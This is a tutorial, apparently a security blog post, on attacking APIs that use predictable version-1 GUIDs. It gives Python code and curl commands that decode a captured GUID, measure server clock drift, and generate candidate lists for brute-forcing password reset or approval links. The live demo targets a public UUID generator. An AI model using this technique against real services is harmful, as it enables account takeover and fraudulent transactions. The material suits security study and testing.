Attacking predictable GUIDs when hacking APIs

If you spend any amount of time hacking APIs, you will come to notice that many endpoints use globally unique identifiers (GUIDs) to represent data in the system. While GUIDs are a great way to ensure data uniqueness, they can also be predictable.

In this article, I want to show you how to take advantage of predictable GUIDs to attack APIs. I’ve used this approach to extract protected data I was not supposed to have access to, and to complete account takeovers.

So let’s get down and dirty into the dark art of demonizing developers… and showcase how (mis)using GUID generation can lead to some interesting attacks on APIs.

A Hacker’s Primer to GUIDs


So before we can get going, I need to clear something up…

GUID vs UUID

If you do this long enough, you will see the terms GUID and UUID used when referring to ids in APIs. Some people say they represent different things. Others say they are the same bloody thing.

So who is right?

GUID is the name Microsoft uses for a reference number that is meant to be unique in any context. It stands for Globally Unique Identifier. UUID stands for Universally Unique Identifier, and it is the term the standards (including RFC 4122) use for the same 128-bit value.

So basically, two terms for the same thing. In the API world, they are used interchangeably. Having spent decades in the Microsoft world, I call them GUIDs.

You call them whatever you like.

So what are GUIDs?

A GUID is a 128-bit value. It is written in hexadecimal, meaning it uses the numbers 0 through 9 and letters A through F. The 32 hexadecimal characters are split into five groups by four hyphens: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX.
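If you want to see that shape for yourself, here is a minimal sketch using Python's standard uuid module. The sample value is one of the GUIDs captured later in this article. Nothing else here is specific to any target.

```python
import uuid

# Sample v1 GUID captured from the demo API later in this article.
guid = uuid.UUID("907886f0-50a4-11ed-8caf-00163e9b33ca")

hex_digits = guid.hex  # the 32 hex characters with the hyphens removed
group_sizes = [len(part) for part in str(guid).split("-")]

print(len(hex_digits) * 4)  # 4 bits per hex character gives the total bit width
print(group_sizes)          # sizes of the five hyphen-separated groups
```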

GUIDs are supposed to be unique, and random. And when used correctly, they can be. However, there is a common mistake developers make that breaks that and makes them predictable… leading to all sorts of problems that we can take advantage of on offense.

How GUIDs are predictable

In accordance with RFC 4122, GUIDs have a specific structure that we can potentially abuse to leak specific information about a target. This goes back to the world of backwards compatibility, and versioning.

You see, back when the original specification was published, the first version of UUID was time-based, and used artifacts of the system to generate unique values. These artifacts include:

The current time
A “clock sequence” that is randomly generated on boot up, but which remains constant between GUIDs
A “node ID”, which is generated based on the system’s MAC address

It looks something like this:

You can read up on the full generation details here.
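To make those three artifacts concrete, here is a rough sketch that pulls them out of a v1 GUID with Python's standard uuid module. The function name decode_v1 is my own for illustration, and the sample GUID is the one captured later in this article.

```python
import uuid
from datetime import datetime, timedelta, timezone

# v1 timestamps count 100-nanosecond ticks since the start of the Gregorian calendar.
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)


def decode_v1(guid_text):
    """Return the timestamp, clock sequence and node ID packed into a v1 GUID."""
    guid = uuid.UUID(guid_text)
    if guid.version != 1:
        raise ValueError("not a v1 GUID")
    # guid.time is the 60-bit tick count; ten ticks make one microsecond.
    generated_at = GREGORIAN_EPOCH + timedelta(microseconds=guid.time // 10)
    # Format the 48-bit node ID the way a MAC address is usually written.
    node_hex = f"{guid.node:012x}"
    mac = ":".join(node_hex[i:i + 2] for i in range(0, 12, 2))
    return {"time": generated_at, "clock_seq": guid.clock_seq, "node": mac}


info = decode_v1("907886f0-50a4-11ed-8caf-00163e9b33ca")
print(info["time"].isoformat())
print(info["clock_seq"])
print(info["node"])
```

The last two groups of the GUID (8caf and 00163e9b33ca here) carry the clock sequence and node ID, which is why they stay the same from one GUID to the next on the same server.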

So here is the thing. The version information is stored in the 13th hexadecimal digit of the GUID (the 15th character if you count the hyphens). That’s the digit right after the second hyphen/dash. So if that digit is a one (1), you know the API may be vulnerable to predictable GUIDs.
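As a quick illustration, the check can be done by hand or with Python's standard uuid module. The helper name guid_version below is just something I made up for this sketch.

```python
import uuid


def guid_version(guid_text):
    """Read the version from the 13th hex digit (hyphens are not counted)."""
    hex_digits = guid_text.replace("-", "")
    return int(hex_digits[12], 16)


sample = "907886f0-50a4-11ed-8caf-00163e9b33ca"
print(guid_version(sample))       # version digit read by hand
print(uuid.UUID(sample).version)  # the standard library reports the same field
```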

It’s actually possible to decode an existing v1 GUID and extract most of the artifacts needed to generate our own list of GUIDs that the system would generate on its own. In other words, we can use this predictability to figure out what the target system would generate at any given time, and then bend that to our advantage.
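Here is a minimal sketch of that idea in Python. It reuses the clock sequence and node ID from a captured GUID and swaps in a timestamp of our choosing. The names to_ticks and forge_v1 are hypothetical helpers, and this is a simplified illustration rather than the code any particular tool uses.

```python
import uuid
from datetime import datetime, timedelta, timezone

GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)


def to_ticks(when):
    """Convert a timezone-aware datetime to 100 ns ticks since 1582-10-15."""
    delta = when - GREGORIAN_EPOCH
    return (delta.days * 86_400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def forge_v1(captured_text, when):
    """Build the v1 GUID the captured host would emit at the moment `when`."""
    captured = uuid.UUID(captured_text)
    ticks = to_ticks(when)
    return uuid.UUID(fields=(
        ticks & 0xFFFFFFFF,                 # time_low
        (ticks >> 32) & 0xFFFF,             # time_mid
        ((ticks >> 48) & 0x0FFF) | 0x1000,  # time_hi with the version set to 1
        captured.clock_seq_hi_variant,      # reused from the captured GUID
        captured.clock_seq_low,             # reused from the captured GUID
        captured.node,                      # reused from the captured GUID
    ))


captured = "d5b0f250-50a6-11ed-8caf-00163e9b33ca"
# Sanity check: forging at the captured GUID's own timestamp should rebuild it.
same_moment = GREGORIAN_EPOCH + timedelta(microseconds=uuid.UUID(captured).time // 10)
rebuilt = forge_v1(captured, same_moment)
one_ms_later = forge_v1(captured, same_moment + timedelta(milliseconds=1))
print(rebuilt)
print(one_ms_later)
```

Notice that moving the clock forward only changes the leading time fields. The tail of the GUID stays put as long as the server has not rebooted or changed network cards.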

Imagine a scenario where an online bank transfer requires an approval process. When a funds transfer is requested, the system generates a unique link that includes a new GUID and sends it to the approver. With a single click, it’s approved.

If we can capture a single GUID during our recon process, and can determine the API server’s time, we have everything we need to forge our own approval links to break the business logic, and allow us to approve our own malicious transfers.

Think that scenario isn’t feasible? What about the modern passwordless web application login systems that do this very thing? Or password reset functionality that follows the secure coding recommendation of using unique URL links? There are plenty of real world scenarios you can attack in this way. You just need to look for places where v1 GUIDs are being used to represent a unique transaction.

OK, so now you have an idea of how to attack predictable GUIDs. Let’s go about practicing this against an actual API target to see this in action.

Attacking your first predictable GUID in an API


We are of course not evil. So I am being a bit liberal when I say we are going to attack a real API. But stick with me here. Practicing this on an API published on the Internet will help you understand how this all works together.

So be nice.

The API in question is the UUID generator at https://uuid.openkm.com/api/version1. A GET request to that endpoint will always return a v1 GUID.

To help you with this predictability attack, I’ve published a gist on GitHub called guid_reaper.py. GUID Reaper is a Python script I wrote, based on guidtool, that lets you quickly dump v1 GUIDs and generate your own set of predictable GUIDs for use against a target.

We will use GUID Reaper to decode a unique identifier that comes back from the API, and then use that to see if we can predict what one of the next GUIDs would be that the API would generate.

With me? Alright then… let’s go!

Step 1: Capture your first GUID from the API

We don’t need to get fancy here. Let’s simply use curl and bring one back:

$ curl https://uuid.openkm.com/api/version1

Calling the API with curl

Step 2: Decode GUID with GUID Reaper

Now that we have the first GUID, run it through GUID Reaper to decode all the bits we will need:

$ ./guid_reaper.py -d 907886f0-50a4-11ed-8caf-00163e9b33ca

Decode a GUID with GUID Reaper

We definitely have a v1 GUID, and now have the node ID (which is the MAC address) and the clock sequence from the target.

Step 3: Calculate time drift between attacker and victim systems

So we’ve got almost everything we need to forge our own predictable GUIDs. However, there is one small artifact we still need to figure out: what time does the API server think it is, and how does that compare with our own system?

Most API endpoints are running on a web server that will include the Date header. So we can usually get the timestamp of the server during our curl if we also pass the -i parameter to dump the response headers. I actually pass -is as I like to run curl in silent/quiet mode.

It ends up looking something like this:

$ curl -is https://uuid.openkm.com/api/version1

Call API and get response headers

If we were to decode that new GUID, we should see that the timestamp lines up with what the GUID holds:

$ ./guid_reaper.py -d d5b0f250-50a6-11ed-8caf-00163e9b33ca

Decoding with GUID Reaper to compare dates

As you can see, the dates match up. But how does that compare to my own system?

We can simply dump a local timestamp when a request is finished and compare. To complete this, I will also throw in a printf call to add a newline after the curl command to ensure my date shows up on its own line. I’ll also use the -u option in date so it will return a UTC date so they are easier to compare.

It looks something like this:

$ curl -is https://uuid.openkm.com/api/version1; printf '\n'; date -u

More fun with curl and date

As you can see, there is about a 5 second drift between the API server’s time, and my own. We need to account for that whenever we generate GUIDs on our system for use against the API server.
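If you would rather let code do the subtraction, here is a small sketch that parses a Date header and compares it to a local timestamp. The function name clock_drift and both sample values are made up for illustration (chosen to reproduce a 5 second gap). Keep in mind the Date header only has one-second resolution, so the result is approximate.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime


def clock_drift(date_header, local_now):
    """Return server time minus local time as a timedelta."""
    server_now = parsedate_to_datetime(date_header)  # timezone-aware for "GMT" headers
    return server_now - local_now


# Illustrative values only: a Date header value and the local UTC time we logged.
header_value = "Thu, 20 Oct 2022 18:41:39 GMT"
local_time = datetime(2022, 10, 20, 18, 41, 34, tzinfo=timezone.utc)

drift = clock_drift(header_value, local_time)
print(drift.total_seconds())  # positive means the server clock is ahead of ours
```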

Knowing that time drift will be important in the next step.

Step 4: Generate our own GUIDs with GUID Reaper

To generate our own GUIDs to use against an API, we simply have to pass GUID Reaper the date of an action that we want to predict the GUID for, along with a previously captured GUID from the target. You can do that with the -t parameter.

GUID Reaper already has a 2 second sliding window, which means when generating a set of GUIDs it will generate ids 2 seconds before and 2 seconds after the time we specify. But since I know there is a 5 second drift between systems, I want to account for that.

Here is an example of what it might look like:

			
$ ./guid_reaper.py -t '2022-10-20 21:04:03' d5b0f250-50a6-11ed-8caf-00163e9b33ca > guidlist.txt

GUID Reaper takes the captured GUID passed in and calculates the precision of the id generation. Many systems have an affinity towards milliseconds. Since a v1 timestamp counts 100-nanosecond intervals, a millisecond-aligned timestamp in a dumped GUID has 4 zeros at the end. This is helpful as it reduces the number of candidate ids we need to generate. In the case of this API, a 2 second sliding window on either side of the target time covers 4 seconds, which at one GUID per millisecond means 4,000 possible GUIDs to try. Of course, the higher the precision required, the larger the candidate list.
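To show where that 4,000 comes from, here is a simplified sketch of the candidate generation in Python. It is an illustration of the idea under the millisecond assumption, not GUID Reaper's actual code, and the names is_millisecond_aligned and candidates are my own.

```python
import uuid
from datetime import datetime, timezone

GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000  # v1 timestamps count 100 ns ticks
TICKS_PER_MS = 10_000


def is_millisecond_aligned(guid_text):
    """True when the timestamp's last four decimal digits are zero."""
    return uuid.UUID(guid_text).time % TICKS_PER_MS == 0


def candidates(captured_text, target, window_seconds=2, step=TICKS_PER_MS):
    """Yield one v1 GUID per step across target +/- window_seconds."""
    captured = uuid.UUID(captured_text)
    delta = target - GREGORIAN_EPOCH
    center = (delta.days * 86_400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10
    span = window_seconds * TICKS_PER_SECOND
    for ticks in range(center - span, center + span, step):
        yield uuid.UUID(fields=(
            ticks & 0xFFFFFFFF,
            (ticks >> 32) & 0xFFFF,
            ((ticks >> 48) & 0x0FFF) | 0x1000,  # version 1
            captured.clock_seq_hi_variant,
            captured.clock_seq_low,
            captured.node,
        ))


captured = "d5b0f250-50a6-11ed-8caf-00163e9b33ca"
target = datetime(2022, 10, 20, 21, 4, 3, tzinfo=timezone.utc)
guid_list = [str(g) for g in candidates(captured, target)]

print(is_millisecond_aligned(captured))
print(len(guid_list))
```

If the captured GUID were not millisecond aligned, you would have to pass a smaller step, and the list grows accordingly. A step of one tick over the same window would be 40 million candidates.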

Step 5: Bruteforce the API endpoint with the candidate list

So it’s kind of hard to do this step against this API. Normally you could use the text file generated as an input into Burp Intruder and fire off requests that rely on the GUID. As an example, if this was an attack against a password reset link, we could fire the GET request and construct the URL and query params accordingly.
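If you prefer scripting over Burp Intruder, turning the candidate list into request URLs is only a few lines. In this sketch the endpoint https://api.example.test/reset and the token parameter are entirely hypothetical, as is the helper name reset_urls. You would swap in whatever the real target uses.

```python
from urllib.parse import urlencode


def reset_urls(base_url, guids, param="token"):
    """Yield one candidate URL per GUID, with the GUID as a query parameter."""
    for guid in guids:
        yield f"{base_url}?{urlencode({param: guid})}"


# Two sample candidates; in practice these would be the lines of guidlist.txt.
sample_guids = [
    "d5b0f250-50a6-11ed-8caf-00163e9b33ca",
    "d5b11960-50a6-11ed-8caf-00163e9b33ca",
]

urls = list(reset_urls("https://api.example.test/reset", sample_guids))
for url in urls:
    print(url)
```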

Since we can’t really do that, what I want to do is simply demonstrate how to generate a list before I even query the API, and then grep for the GUID returned in my generated list to prove it worked.

The command looks something like this:

			
$ ./guid_reaper.py -t '2022-10-20 21:04:03' d5b0f250-50a6-11ed-8caf-00163e9b33ca > guidlist.txt ; head -n 1 guidlist.txt; tail -n 1 guidlist.txt; printf '\n'; curl -is https://uuid.openkm.com/api/version1

GUID Reaper #FTW

Notice the 3 GUIDs? The first two represent the first and last GUIDs generated by GUID Reaper. The last GUID is the one returned by the API. And when we grep through the guidlist.txt file… yep… it’s right there.

Score!

Now, to deal with the time drift, I used a simple trick. I know GUID Reaper has a 2 second sliding window, and that my system is about 5 seconds off from the API server. So I ran this at exactly 2:04:00 PM on my system, but set the time parameter to 2:04:03 PM (21:04:03 GMT). This ensured that the candidates generated locally, and the GUID generated on the web server, fell in the same time range.
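That bit of arithmetic is easy to script. The sketch below assumes, as the numbers above suggest, that the server clock is ahead of mine, and it formats the result the same way as the -t value used earlier. The helper name reaper_time_arg is hypothetical.

```python
from datetime import datetime, timedelta, timezone


def reaper_time_arg(local_now, offset_seconds):
    """Shift the local time by an offset and format it like the -t value above."""
    shifted = local_now + timedelta(seconds=offset_seconds)
    return shifted.strftime("%Y-%m-%d %H:%M:%S")


# Local clock reads 21:04:00 UTC. Aiming 3 seconds ahead lets the 2 second
# window stretch toward a server clock that is roughly 5 seconds ahead.
local_run_time = datetime(2022, 10, 20, 21, 4, 0, tzinfo=timezone.utc)
time_arg = reaper_time_arg(local_run_time, 3)
print(time_arg)
```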

TIP: If you don’t want to do this sort of math for time drift in your head, just sync up your local clock to match that of the server before the attack.

Conclusion

So there you have it. If you ever find a target API that is using v1 GUIDs in an endpoint, and that endpoint is relying on the GUID as part of its business logic, you have an opportunity to predict it, and pwn it.

You can get really creative with this. I will leave it to your mind’s eye to think about and see all the possibilities. 😈